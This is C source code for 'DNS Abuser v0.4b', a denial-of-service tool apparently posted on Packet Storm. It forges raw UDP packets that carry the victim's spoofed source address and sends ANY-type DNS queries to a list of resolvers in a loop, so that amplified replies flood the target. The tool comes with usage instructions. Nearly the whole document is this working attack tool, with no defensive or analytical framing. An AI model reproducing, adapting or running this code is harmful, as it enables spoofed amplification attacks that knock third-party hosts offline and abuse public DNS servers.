Exploit code for a denial of service attack using DNS
54f6a05c7bd3633fc25136253fc301a126258887652dc3d2c1208e341ec62662/*
* DNS Abuser v0.4b
*
* Author: Nemo (cveira@airtel.net)
* http://www.deepzone.org
*
* This code is a little enhancement based on DOOMDNS by FuSyS & |scacco|
* http://www.www.s0ftpj.org
*
* Usage: dnsa <target>
* dnsa <target> <times> [<dns_servers.txt> <querys.txt>]
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <time.h>
#define IP_HEAD_BASE 20
#define UDP_HEAD_BASE 8
#define DEF_TIMES 1000
#define DNS_QSIZE 255
#define MAX_QUERYS 25 // maximum buffer size
#define MAX_SERVERS 25 // maximum buffer size
#define CNAME_LENGTH 255 // max CNAME length
#define DEF_DOMAINS "./domains.txt" // domain list file
#define DEF_QUERYS "./querys.txt" // query list file
struct DNS_MSG {
HEADER head;
char query[DNS_QSIZE];
};
struct dns_pkt {
struct iphdr ip;
struct udphdr udp;
char data[1000];
};
struct domain_buff {
int used;
char cname[CNAME_LENGTH];
};
typedef struct domain_buff tdbuff;
tdbuff dnsquery[MAX_QUERYS];
tdbuff domains[MAX_SERVERS];
unsigned long saddr;
int sd, dptr, qptr; // socket & array pointers
FILE *dd, *qd; // file pointers
int startptr(tdbuff *buff, int buff_limit) // hash function
{
int init = 0;
init = getpid() % buff_limit;
while (!buff[init].used)
{
if (++init > buff_limit) init = 0;
}
return init;
}
void rst_buff(tdbuff *b, int max)
{
memset(b, 0, sizeof(tdbuff)*max);
}
void readln(FILE *f, tdbuff *buff)
{
int eol = 0,
i = 0;
tdbuff b;
rst_buff(&b, 1);
do
{
b.cname[i] = fgetc(f);
if (!ferror(f))
{
if (!feof(f))
{
if (b.cname[i] == '\n')
{
b.cname[i] = '\0';
b.used = 1;
eol = 1;
}
else if ((i+1) >= CNAME_LENGTH)
{
fprintf(stderr, "\nInvalid CNAME or invalid file format. Quitting...\n");
exit(7);
}
else
{
i++;
}
}
else
{
if (b.cname[i] == '\n')
{
b.cname[i] = '\0';
b.used = 1;
}
}
}
else
{
fprintf(stderr, "\nRead error. Quitting...\n");
exit(6);
}
}
while ((!ferror(f) && !feof(f)) && !eol);
if (!ferror(f) && !feof(f)) *buff = b;
}
unsigned long nameResolve(char *hostname)
{
struct in_addr addr;
struct hostent *hostEnt;
if ((inet_aton(hostname, &addr)) == 0)
{
if (!(hostEnt=gethostbyname(hostname)))
{
fprintf(stderr,"\nTarget '%s' does not exist\n",hostname);
exit(0);
}
bcopy(hostEnt->h_name,(char *)&addr.s_addr,hostEnt->h_length);
}
return addr.s_addr;
}
void forge (unsigned long daddr, unsigned short psrc, unsigned short pdst)
{
struct sockaddr_in sin;
struct dns_pkt dpk;
struct DNS_MSG killer;
int shoot, len;
// adjust pointer ...
if (qptr < MAX_QUERYS)
{
if(!dnsquery[dptr].used) qptr++;
}
else
{
qptr = 0;
}
dnsquery[qptr].used = 1;
// build packets ...
memset(&killer, 0, sizeof(killer));
killer.head.id = getpid();
killer.head.rd = 1;
killer.head.aa = 0;
killer.head.opcode = QUERY;
killer.head.qr = 0;
killer.head.qdcount = htons(1);
killer.head.ancount = htons(0);
killer.head.nscount = htons(0);
killer.head.arcount = htons(0);
strcat(killer.query, dnsquery[qptr].cname);
killer.query[strlen(dnsquery[qptr].cname) + 2] = 0x00FF;
killer.query[strlen(dnsquery[qptr].cname) + 4] = 0x0001;
memset(&dpk, 0, sizeof(dpk));
dpk.udp.source = psrc;
dpk.udp.dest = pdst;
len = (12 + strlen(killer.query) + 5);
dpk.udp.len = htons(UDP_HEAD_BASE + len);
memcpy(dpk.data, (void*)&killer, len);
dpk.ip.ihl = 5;
dpk.ip.version = 4;
dpk.ip.tos = 0;
dpk.ip.tot_len = htons(IP_HEAD_BASE+UDP_HEAD_BASE+len);
dpk.ip.frag_off = 0;
dpk.ip.ttl = 64;
dpk.ip.protocol = IPPROTO_UDP;
dpk.ip.saddr = saddr;
dpk.ip.daddr = daddr;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = pdst;
sin.sin_addr.s_addr = daddr;
shoot = sendto(sd ,
&dpk ,
(IP_HEAD_BASE + UDP_HEAD_BASE + len),
0 ,
(struct sockaddr *)&sin ,
sizeof(sin)
);
if (shoot < 0) fprintf(stderr, "SPOOF ERROR");
}
void doomzone (void)
{
unsigned long daddr;
unsigned short psrc, pdest;
// adjust pointer ...
if (dptr < MAX_SERVERS)
{
if(!domains[dptr].used) dptr++;
}
else
{
dptr = 0;
}
domains[dptr].used = 1;
daddr = nameResolve(domains[dptr].cname);
psrc = htons(1024 + (rand()%2000));
pdest = htons(53);
forge(daddr, psrc, pdest);
}
int main (int argc, char *argv[])
{
int i, sd_opt, code;
unsigned int times = DEF_TIMES;
printf("\n\n\033[1;32mDNS Abuser v0.4b\033[0m");
printf("\n\033[1;34mDNS-based flooder by Nemo - http://www.deepzone.org\033[0m");
printf("\n\033[1;34mBased on FuSyS & |scacco| work: D00MDNS - http://www.s0ftpj.org\033[0m\n");
// ->simple<- parameter checking :P
if (argc < 2)
{
fprintf(stderr, "\nUsage: %s <target>", argv[0]);
fprintf(stderr, "\n %s <target> <times> [<dns_servers.txt> <querys.txt>]\n\n", argv[0]);
exit(0);
}
saddr = nameResolve(argv[1]);
if (argc > 2) times = atoi(argv[2]);
// loading files
if (argc > 3)
{
if ((dd = fopen(argv[4], "r")) == NULL)
{
fprintf(stderr, "\nCannot open domain file. Quitting...\n");
exit(4);
}
if ((qd = fopen(argv[5], "r")) == NULL)
{
fprintf(stderr, "\nCannot open query file. Quitting...\n");
exit(5);
}
}
else
{
if((dd = fopen(DEF_DOMAINS, "r")) == NULL)
{
fprintf(stderr, "\nCannot open domain file. Quitting...\n");
exit(4);
}
if((qd = fopen(DEF_QUERYS, "r")) == NULL)
{
fprintf(stderr, "\nCannot open query file. Quitting...\n");
exit(5);
}
}
rst_buff(domains, MAX_SERVERS);
rst_buff(dnsquery, MAX_QUERYS);
i = 0;
do
{
readln(dd, &domains[i]);
i++;
}
while ((i < MAX_SERVERS) && !feof(dd));
i = 0;
do
{
readln(qd, &dnsquery[i]);
i++;
}
while ((i < MAX_QUERYS) && !feof(qd));
// opening sockets ...
srand(time(NULL));
sd_opt = 1;
if ((sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf(stderr, "\nSocket error. Quitting...\n");
exit(2);
}
if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &sd_opt, sizeof(sd_opt)) < 0)
{
fprintf(stderr, "\nIP Error. Quitting...\n");
exit(3);
}
dptr = startptr(domains, MAX_SERVERS);
qptr = startptr(dnsquery, MAX_QUERYS);
// flooding engine
printf("\n\033[1;34mFlooding %s:\033[0m\n", argv[1]);
while(times--)
{
doomzone();
printf("\033[1;34m.\033[0m");
}
printf("\n\n");
fclose(dd);
fclose(qd);
return(0);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed